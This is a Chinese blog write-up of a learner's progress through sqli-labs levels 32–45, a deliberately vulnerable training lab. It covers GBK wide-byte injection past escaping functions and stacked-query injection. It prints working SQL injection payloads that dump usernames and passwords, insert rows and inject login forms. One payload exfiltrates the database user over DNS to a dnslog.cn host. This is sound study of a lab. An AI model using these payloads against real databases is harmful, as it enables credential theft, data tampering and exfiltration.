sqlilab学习打卡|手工注入|Less32-Less45

已于 2022-04-03 17:42:29 修改
阅读量2.9k 收藏 1
点赞数
分类专栏: sqlilab学习打卡 文章标签: 网络安全 web安全
于 2022-04-03 17:40:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hiahiaQ_Q/article/details/123940988
版权

less-32 Bypass addslashes

又是一道不会的,直接上源码看下

image-20220403092807829

分别在\ ’ " 前面加上反斜杠,所以绕过就需要解决反斜杠

解决方法一:宽字节注入

先看源码,设置编码方式为gbk

image-20220403093120935

然后来举个例子,理解下宽字节注入原理

假设输入id=1’,那么会被服务器过滤为1\',那么转为gbk编码(十六进制)后为,31 5c 27

我们要想办法保留27,那么只要找一个汉字,其gbk编码后一个字节为5c即可,这里我找到的有

df 5c ab 5c 83 5c

只要去查gbk编码表,能找到很多

这样,在url中输入对应的url编码,输入内容变为1%83',就会转变为gbk编码31 83 5c 27 ,df5c会被识别成一个汉字,因此,拼接进的id就变成了1僜',这样就既去掉了反斜杠保留了单引号
不理解的可以去了解下各种编码ascii unicode utf-8之类,稍微了解下就好懂了
GBK在线编码

GBK编码表

id=-1%83' union select 1,2,(SELECT+GROUP_CONCAT(username,0x2c,password+SEPARATOR+0x3c62723e)+FROM+users)--+

image-20220403092550789

本来还想看看有没有别的方法,找了半天没找着,就先这样了。

less-33

同上一关差不多

less-34

get方法和post方法提交参数的不同点:

get方法将参数直接当作url编码提交

post方法会先将参数都进行url编码后再提交

在hackbar中post提交会进行url编码,因此这关需要使用burp抓包避免这种情况

还是addslashes转义,依然宽字节注入

另外我还看到一种方法是utf16绕过,先🐎为敬

less-35

输入单引号直接报错,显示有转义,根据报错信息猜测是数字型,验证成功

?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 – +

less-36

?id=a%df' || 1=1 -- =测试出宽字节注入,单引号闭合,无报错,有回显

image-20220403112605235

看了下源码,发现这关过滤函数换成了mysql_real_escape_string,依然宽字节绕过

不过这几关能绕过,特殊条件就是要gbk编码,我将编码语句注释掉,再次测试就发现网上说的宽字节和utf-16都没办法绕过了

less-37

有回显,无报错

post方法一定要用burp抓包,要不然一堆问题

这关是mysql_real_escape_string和post方法

以上都是对于加反斜杠转义的绕过,方法差不多都是用宽字节,前提条件需要gbk编码,如果没有gbk编码,我还是不知道怎么绕过。。

less-38 Stacked query

堆叠注入,多条sql语句一起执行达成注入

堆叠注入的限制条件

id=a’ union select 1,2,3;insert into users values(111,‘22’,‘33’)-- =

image-20220403140749952

欸嘿嘿

总算看到有点意思的东西了,less-38 dnslog | getshell MYSQL注入 dnslog secure_file_priv修改设置

这里我用的DNSlog平台

?id=1');select load_file(concat('\\\\',(select hex(user())),'.ulec9h.dnslog.cn\\AAA')) -- =

image-20220403154031257

成果展示

image-20220403154123600

less-39

有报错,有回显,测试发现是数字型注入

id=1;insert into users values(113,‘2’,‘33’); #

跟上关差不多

less-40

?id=1')||('测出单引号括号闭合

?id=1');insert into users values(1111,'1','2') -- =执行成功

本来还想这关是不是和之前一样,我这没有进对入口文件,然后看到还是有人和我一样情况,那我就放心了

image-20220403155646791

less-41

数字型注入,无报错,有回显

?id=1;insert into users values(1013,'2','33'); #

image-20220403160457348

less-42

多页面再次出现,注册用户界面如下

image-20220403161050358

既然要想办法给自己创建个用户,也就是insert进去,就得想想哪里更有可能进行堆叠注入

想了下觉得漏洞更有可能出现在登录界面

测试发现有报错信息

还挺简单直接就可以insert进数据

login_user=1&login_password=2';insert into users value(111111111,'123','123') -- =&mysubmit=Login

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-cYdMahEj-1648978637281)(https://cdn.jsdelivr.net/gh/r2233r/psBed@main/img/202204031614766.png)]

less-43

注意post数据要传给login.php,闭合方式是单引号加括号,有报错回显

和上一关差不多,八多说了

less-44

login_user=1 &login_password=2'|' &mysubmit=Login测出单引号闭合,无报错信息

测试堆叠注入还是能成功

跟之前的差不多

less-45

单引号加括号闭合,无报错

image-20220403172807676

login_user=1 &login_password=2');insert into users value(111111110,'123','123') -- =&mysubmit=Login

还是和之前的差不多,不多说了

哎呀妈呀总算过完上面这些了,说实话,这一部分有点点枯燥,比较简单,但是又还得过一遍

总结

less32-less37都是宽字节注入

less38-less45都是堆叠注入

吃饭饭l
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mysql 绕过addslashes,SQL注入:Bypass addslashes()
weixin_39719749的博客
03-23 1313
上次研究了GBK双字节注入,这次就得想办法用于实战,我们知道在很多时候,代码会对我们的输入进行过滤或者转义,过滤的的话我们想办法绕过就行,而转义,就得另想办法了addslashes()这是PHP中的一个安全函数addslashes() 函数在指定的预定义字符前添加反斜杠。这些预定义字符是:单引号 (‘)双引号 (“)反斜杠 (\)NULL语法addslashes(string)参数描述string...
微信小程序-木棉小镇 创建打卡学习小组
03-15
利用小程序的template做的组件,主要还是依靠比较好目录结构... 免责声明:本站所有文章和图片均来自用户分享和网络收集,文章和图片版权归原作者及原出处所有,仅供学习与参考,请勿用于商业用途,如果损害了您的权利
sqli-lab注入练习源码
06-25
本套源码是sqli-lab,练习sql再好不过,将源码用phpstudy搭建即可开始练习
Sqli-labs之Less-32和Less-33
m0_46315342的博客
06-04 991
                                          &nbs...
sql-laps less32 双字节注入 解析
qq_73722777的博客
04-17 150
(这里使用了一个子查询代替表名,因为所有的单引号都会被转义,于是我们使用套娃子查询绕过单引号的使用)(这里不是很明白为什么id中存在汉字但依然没报错,将1改为0后才会报错使原select语句失效)这里可以看见在我们输入的查询语句 ‘ 的前面被添加了一个转义符号使得我们的单引号失效了。这里的0x3a是冒号(:)的16进制ascii编码,同样也是为了绕过引号。可以看见网页出现报错,说明我们成功绕过转义符与前面的引号实现闭合。判断位点后我们选择3位点进行数据查询,构造payload。当limit 3,1。
基于Sqli-Labs靶场的SQL注入-32~37关
Joker
01-09 1091
这篇博客我主要讲宽字节注入,包括一些转义函数的简单讲解。主要理解宽字节注入的原理即可。
人脸打卡机)-WiFi-TCP网络通信.docx
12-17
人脸打卡机)-WiFi-TCP网络通信.docx
人脸打卡机)-WiFi-UDP网络通信.docx
12-17
人脸打卡机)-WiFi-UDP网络通信.docx
DataWhale组队打卡学习营task04-1 机器翻译
01-06
机器翻译和数据集 机器翻译(MT):将一段文本从一种语言自动翻译为另一种语言,用神经网络解决这个问题通常称为神经机器翻译(NMT)。 主要特征:输出是单词序列而不是单个单词。 输出序列的长度可能与源序列的长度...
《动手学深度学习》第二次打卡-学习小队
01-06
一、学习任务: Task03:过拟合、欠拟合及其解决方案;梯度消失、梯度爆炸;循环神经网络进阶 Task04:机器翻译及相关技术;注意力机制与Seq2seq模型;Transformer Task05:卷积神经网络基础;leNet;卷积神经网络...
Less-32宽字节注入练习
记录笔记
04-11 157
宽字节: GB2312、GBK、GB18030、BIG5、Shift_JIS等这些都是常说的宽字节,实际上只有两字节。 宽字节带来的安全问题主要是ASCII字符(一字节)的现象,即将两个ascii字符误认为是一个宽字节字符。 中文、韩文、日文等均存在宽字节,英文默认都是一个字节。 在使用PHP连接MySQL的时候,当设置“set character_set_client = gbk”时会导致一个编码转换的问题。 例子: id= 1’ 处理 1 \’ 进行编码 1%5c%27 带入sql后 id = \’ a
sqli-labs Less 32通关
weixin_64809022的博客
02-20 169
宽字节注入
sqlilabs less-32~less-37
TA不懒,但还没有添加简介
07-27 282
sqlilabs less-32~less-37
sqli-labs/Less-32
m0_71299382的博客
11-20 295
sqli-labs第三十二关
sqli-labs:less-32(宽字节注入
羽的博客
10-19 3025
宽字节注入 产生原因: 1、mysql 在使用 GBK 编码的时候,会认为两个字符为一个汉字,例如%aa%5c 就是一个汉字(前一个 ascii 码大于 128 才能到汉字的范围) 2、mysqli_real_escape_string() 函数转义在 SQL 语句中使用的字符串中的特殊字符。 mysqli_real_escape_string(*connection,escapestring*) connection 必需。规定要使用的 MySQL 连接 escapestr...
sqli-labs (less-32)
kukudeshuo的博客
03-13 1802
sqli-labs (less-32) 进入32关,输入 http://127.0.0.1/sql1/Less-32/?id=1 http://127.0.0.1/sql1/Less-32/?id=1' 这里我们发现我们输入的’直接被转义成\了,在一般情况下,此处是不存在SQL注入漏洞的,不过有一个特例,就是当数据库的编码为GBK时,可以使用宽字节注入,宽字节的格式是在地址后先加一个%df,再加单引号,因为反斜杠的编码为%5c,而在GBK编码中,%df%5c是繁体字“連”,所以这时,单引号成功逃逸,
SqliLab_Mysql_Injection详解_字符型注入(十一)_宽字节注入32~37)
qq_41260930的博客
11-01 688
1. SqliLab_Mysql_Injection详解_字符型注入(十一) 1.1. SQL注入_宽字节注入 1.2. 原理 GBK编码规则:GBK编码,编码的范围为 8140-FEFE,首字节在 81-FE 之间,尾字节在 40-FE 之间,字符 \ 的ASCII码为5C,在其低位范围内,就可能被转换为一个服务器数据库不识别的汉字,并且能和它组合的字符不仅只有0xdf,%815c/%825c...
对宽字节的深入了解
→_→
05-07 6440
01 背景知识 字符集 在了解宽字节注入之前,我们先来看一看字符集是什么。字符集也叫字符编码,是一种将符号转换为二进制数的映射关系。 几种常见的字符集: ASCII编码:单字节编码 latin1编码:单字节编码 gbk编码:使用一字节和双字节编码,0x00-0x7F范围内是一位,和 ASCII 保持一致。双字节的第一字节范围是0x81-0xFE UTF-8编码:使用一至四字节编码,0x......
绘制学习打卡软件的构件图
最新发布
06-01
好的,以下是绘制学习打卡软件的构件图: ![构件图](https://i.imgur.com/5PpEMEz.png) 该软件的主要构件包括:用户界面、打卡记录管理模块、学习计划管理模块、用户信息管理模块、打卡提醒模块、数据统计模块和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值